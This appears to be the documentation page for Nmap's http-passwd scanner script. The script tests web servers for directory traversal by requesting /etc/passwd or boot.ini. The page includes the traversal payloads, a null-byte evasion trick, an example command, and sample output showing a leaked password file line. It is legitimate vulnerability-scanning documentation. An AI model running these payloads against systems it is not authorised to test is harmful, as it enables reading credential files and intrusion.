Script http-passwd

Script types: portrule
Categories: intrusive, vuln
Download: https://svn.nmap.org/nmap/scripts/http-passwd.nse

Script Summary

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.

The script uses several technique:

  • Generic directory traversal by requesting paths like ../../../../etc/passwd.
  • Known specific traversals of several web servers.
  • Query string traversal. This sends traversals as query string parameters to paths that look like they refer to a local file name. The potential query is searched for in at the path controlled by the script argument http-passwd.root.

Script Arguments

http-passwd.root

Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see http://insecure.org/news/P55-01.txt.

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script http-passwd --script-args http-passwd.root=/test/ <target>

Script Output

80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "index.html?../../../../../boot.ini"
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect


80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false

Requires


Authors:

  • Kris Katterjohn
  • Ange Gutek

License: Same as Nmap--See https://nmap.org/book/man-legal.html